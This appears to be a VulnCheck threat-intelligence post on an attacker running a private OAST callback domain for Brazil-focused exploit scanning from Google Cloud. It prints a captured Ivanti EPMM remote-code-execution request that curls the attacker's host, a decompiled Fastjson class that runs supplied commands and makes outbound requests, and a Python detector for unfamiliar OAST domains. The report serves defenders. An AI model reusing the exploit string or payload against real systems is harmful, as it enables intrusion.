Background
Out-of-band application security testing (OAST) endpoints are widely used in internet-wide exploit scanning, and most actors rely on public services like oast.fun because they require no infrastructure. That is why callbacks to detectors-testing.com in VulnCheck’s Canary Intelligence traffic stood out. An attacker appeared to be running a private OAST domain and using it in a regionally focused exploit operation.
We observed roughly 1,400 exploit attempts spanning more than 200 CVEs linked to this infrastructure. While most of the activity resembled standard Nuclei templates, the attacker’s hosting choices, payloads, and regional targeting did not align with typical OAST use.
An Unfamiliar OAST
OAST makes it easy for attackers to verify command execution, SSRF, deserialization, and other classes of vulnerabilities. Commodity scanners like Nuclei typically use public services for this purpose, and their callbacks usually look like:
<random>.oast.pro
<random>.oast.me
<random>.interact.sh
So when VulnCheck’s canaries began observing OAST callbacks to subdomains of i-sh.detectors-testing.com, a domain we had never seen before, the pattern stood out. This is not a known OAST provider or anything referenced by popular scanning frameworks.
For example, the entry below from our Canary Intelligence data shows an exploit attempt for CVE-2025-4428 (Ivanti EPMM). If the exploit were successful, the compromised host would issue an HTTP request to d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com, one of the attacker’s OAST subdomains:
{
  "src_ip": "34.172.194.72",
  "src_port": 32902,
  "src_country": "US",
  "dst_country": "BR",
  "cve": "CVE-2025-4428",
  "signature_id": 12700562,
  "signature": "VULNCHECK Ivanti Endpoint Manager Mobile CVE-2025-4428 Exploit Attempt (RCE)",
  "category": "Web Application Attack",
  "severity": 1,
  "http": {
    "url": "/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com')%7d",
    "http_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15",
    "protocol": "HTTP/1.1"
  },
  "timestamp": "2025-11-18T15:59:29.982Z"
}
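As an added example (not VulnCheck's code), the Python below applies the distinction drawn above to canary events shaped like the record just shown: it URL-decodes each request URL, pulls out hostnames that look like OAST callbacks, and flags any that do not belong to a public OAST provider. The hostname regex is a heuristic, and the sample events other than the one reusing this post's URL (including their CVE placeholders) are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Public OAST providers that commodity scanners such as Nuclei default to
# (the ones named in the post). A callback to any other domain is worth a look.
KNOWN_OAST_SUFFIXES = ("oast.pro", "oast.me", "oast.fun", "interact.sh")

# Heuristic (assumption): an OAST callback hostname starts with a long random
# label (Interactsh uses roughly 33 characters) followed by the provider's domain.
HOST_RE = re.compile(r"\b([a-z0-9]{12,}(?:\.[a-z0-9-]+)+\.[a-z]{2,})\b", re.I)


def callback_hosts(event):
    """Candidate callback hostnames in a canary event's (URL-encoded) request URL."""
    url = event.get("http", {}).get("url", "")
    return {h.lower() for h in HOST_RE.findall(unquote(url))}


def is_public_oast(host):
    """True when the host belongs to one of the well-known public OAST services."""
    return any(host == s or host.endswith("." + s) for s in KNOWN_OAST_SUFFIXES)


def flag_private_oast(events):
    """Return (src_ip, cve, host) for every callback not aimed at a public OAST service."""
    hits = []
    for ev in events:
        for host in sorted(callback_hosts(ev)):
            if not is_public_oast(host):
                hits.append((ev["src_ip"], ev["cve"], host))
    return hits


# Constructed sample events in the shape of the Canary Intelligence record above:
# the first reuses the URL from the post, the other two are made up for contrast.
SAMPLE_EVENTS = [
    {"src_ip": "34.172.194.72", "cve": "CVE-2025-4428",
     "http": {"url": "/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass()"
                     ".forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass()"
                     ".forName('java.lang.Runtime')).exec('curl%20d4bqsd6e47mo47d93lpgq55d3j111y6em"
                     ".i-sh.detectors-testing.com')%7d"}},
    {"src_ip": "198.51.100.7", "cve": "CVE-0000-0000",   # placeholder CVE, public OAST callback
     "http": {"url": "/login?next=http://c7s8m4n2p1qz0h4k3l9j8f2d1.oast.pro/x"}},
    {"src_ip": "198.51.100.8", "cve": "CVE-0000-0001",   # placeholder CVE, no callback at all
     "http": {"url": "/actuator/env"}},
]

if __name__ == "__main__":
    for src_ip, cve, host in flag_private_oast(SAMPLE_EVENTS):
        print(f"{src_ip} {cve} -> unfamiliar OAST domain {host}")
```

Running it on the constructed events reports only the detectors-testing.com callback; the oast.pro one is recognised as a public provider and the third event carries no callback.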
Over time, we saw more than 200 unique CVE exploitation attempts associated with this infrastructure. Most of what we observed were standard Nuclei templates. However, some of the templates were no longer part of the current Nuclei library.
For example, the attacker used the old grafana-file-read.yaml template, which was removed from nuclei-templates in early October 2025. The template still appears in some third-party Nuclei-based scanners, such as dddd, so the presence of this older version could indicate that they are using one of these tools or that they simply have not updated their Nuclei installation.
Additionally, between October 12, 2025 and November 14, 2025, we observed more than 1,400 exploit attempts targeting the canaries we had deployed in Brazil. We operate canaries across the globe, so the regional concentration stood out. AbuseIPDB reports show the same attacker IP addresses also being flagged in Serbia and Turkey, but in our dataset the activity was focused entirely on Brazil.
The regional nature of the attacks is notable, and so is their origin. Every source we observed came from US-based Google Cloud infrastructure.
- 34.172.194.72 (exploit scanner)
- 35.194.0.176 (exploit scanner)
- 34.133.225.171 (exploit scanner)
- 34.68.101.3 (exploit scanner)
- 34.42.21.27 (exploit scanner)
- 34.16.7.161 (exploit scanner)
- 34.136.22.26 (OAST host)
Using Google Cloud gives the attacker practical benefits. Defenders are unlikely to block a major US cloud provider, and traffic headed toward Google networks blends easily with ordinary background communication.
This does not seem to be new behavior. urlquery has reported OAST callbacks involving i-sh.detectors-testing.com at 34.136.22.26 dating back to at least November 2024, which suggests this host has been part of someone’s scanning infrastructure for quite some time. A year-long OAST presence is rare; most opportunistic scanners churn infrastructure rapidly. CloudSEK has also mentioned detectors-testing.com in a broader writeup on Androxgh0st activity, although their attribution is weak. In our own telemetry, the same 34.136.22.26 address consistently presents Interactsh services across ports 80, 443, and 389, reinforcing that this system is being operated as a dedicated OAST endpoint. Our IP Intelligence entry for 34.136.22.26 looks like the following:
[
  {
    "ip": "34.136.22.26",
    "port": 389,
    "ssl": false,
    "lastSeen": "2025-11-25T05:13:48.086894",
    "asn": "AS396982",
    "country": "United States",
    "country_code": "US",
    "city": "Council Bluffs",
    "cve": [],
    "matches": [
      "Interactsh"
    ],
    "hostnames": [
      "26.22.136.34.bc.googleusercontent.com"
    ],
    "type": {
      "id": "c2",
      "kind": "Attack Infrastructure",
      "finding": "command and control infrastructure"
    },
    "feed_ids": [
      "7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997"
    ],
    "_timestamp": "2025-11-25T09:44:44.891435404Z"
  },
  {
    "ip": "34.136.22.26",
    "port": 443,
    "ssl": true,
    "lastSeen": "2025-11-22T22:18:34.906307",
    "asn": "AS396982",
    "country": "United States",
    "country_code": "US",
    "city": "Council Bluffs",
    "cve": [],
    "matches": [
      "Interactsh"
    ],
    "hostnames": [
      "26.22.136.34.bc.googleusercontent.com"
    ],
    "type": {
      "id": "c2",
      "kind": "Attack Infrastructure",
      "finding": "command and control infrastructure"
    },
    "feed_ids": [
      "7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997"
    ],
    "_timestamp": "2025-11-25T09:45:23.971299688Z"
  },
  {
    "ip": "34.136.22.26",
    "port": 25,
    "ssl": false,
    "lastSeen": "2025-11-22T22:06:42.440830",
    "asn": "AS396982",
    "country": "United States",
    "country_code": "US",
    "city": "Council Bluffs",
    "cve": [],
    "matches": [
      "Interactsh"
    ],
    "hostnames": [
      "26.22.136.34.bc.googleusercontent.com"
    ],
    "type": {
      "id": "c2",
      "kind": "Attack Infrastructure",
      "finding": "command and control infrastructure"
    },
    "feed_ids": [
      "7f6bc0e7-8064-40f8-b7d4-c4ebc17cf997"
    ],
    "_timestamp": "2025-11-25T09:44:13.709554907Z"
  }
]
Although i-sh.detectors-testing.com behaves like a standard OAST endpoint, it also exposes additional material that gives more insight into the actor’s tooling. In particular, an open directory on port 9000 hosts a Java class file associated with Fastjson 1.2.47 exploitation (not tied to a specific CVE, but we are working to resolve that).

The file, TouchFile.class, is documented in Vulhub’s Fastjson 1.2.47 exploitation example, but the Vulhub version is short and only touches a file. This attacker’s implementation keeps the same default behavior (touch /tmp/success3125) but extends it. If no parameters are provided, it runs the default command. If cmd parameters are present, it executes those commands instead, and if http parameters are present, it makes outbound HTTP requests to those URLs.
A trimmed version of the decompiled class looks like this:
// Trimmed decompilation; the standard-library imports the fragment needs are added here.
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLDecoder;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class TouchFile {
    static {
        try {
            String defaultCmd = "touch /tmp/success3125";
            List<String> cmds = new ArrayList<>();
            List<String> urls = new ArrayList<>();
            // The class's own codebase URL; its parameters travel in the query string.
            URL codebase = TouchFile.class.getProtectionDomain()
                .getCodeSource()
                .getLocation();
            if (codebase != null) {
                String s = codebase.toString();
                int idx = s.indexOf("?");
                if (idx != -1 && idx < s.length() - 1) {
                    Map<String, List<String>> params = new HashMap<>();
                    String query = s.substring(idx + 1);
                    for (String part : query.split("&")) {
                        String[] kv = part.split("=", 2);
                        if (kv.length == 2) {
                            params.computeIfAbsent(kv[0], k -> new ArrayList<>())
                                .add(URLDecoder.decode(kv[1], "UTF-8"));
                        }
                    }
                    if (params.containsKey("cmd")) {
                        cmds.addAll(params.get("cmd"));
                    }
                    if (params.containsKey("http")) {
                        urls.addAll(params.get("http"));
                    }
                }
            }
            // Without a cmd parameter the behaviour matches the Vulhub sample.
            if (cmds.isEmpty()) {
                cmds.add(defaultCmd);
            }
            for (String cmd : cmds) {
                Process p = Runtime.getRuntime().exec(cmd.split(" "));
                p.waitFor();
            }
            // Each http parameter produces an outbound GET, i.e. an OAST-style callback.
            for (String u : urls) {
                HttpURLConnection c = (HttpURLConnection) new URL(u).openConnection();
                c.setRequestMethod("GET");
                c.getResponseCode();
            }
        } catch (Exception e) {
            e.printStackTrace(System.err);
        }
    }
}
The behavior of TouchFile.class illustrates how the attacker adapts publicly available tooling to their needs. It is a small detail, but it shows that the actor is willing to modify common exploit components rather than rely on them exactly as published.
Conclusion
Taken together, the use of a private OAST host, a mix of outdated and current Nuclei templates, and a custom Fastjson payload indicates an operation with more structure than typical exploit spraying. The long-lived OAST infrastructure and the consistent regional focus suggest an actor that is running a sustained scanning effort rather than short-lived opportunistic probes.
Regardless of attribution, this activity highlights a broader trend. Attackers continue to take off-the-shelf tooling like Nuclei and spray exploits across the internet to quickly identify and compromise vulnerable assets. They show little concern for the indicators or compromised accounts these tools leave behind, as long as the approach helps them find targets efficiently. The only way to protect yourself from such attackers is to monitor your network, understand what is exposed, and outpace adversaries.
About VulnCheck
VulnCheck’s research team tracks attacker infrastructure and exploit activity using our Canary Intelligence and IP Intelligence datasets. Investigations like this one into attacker-run OAST services and structured scanning workflows are part of our ongoing effort to highlight real-world exploitation trends. For more research like this check out our blogs, XWiki Under Increased Attack and ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611).
Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, Canary Intelligence, and Exploit & Vulnerability Intelligence products.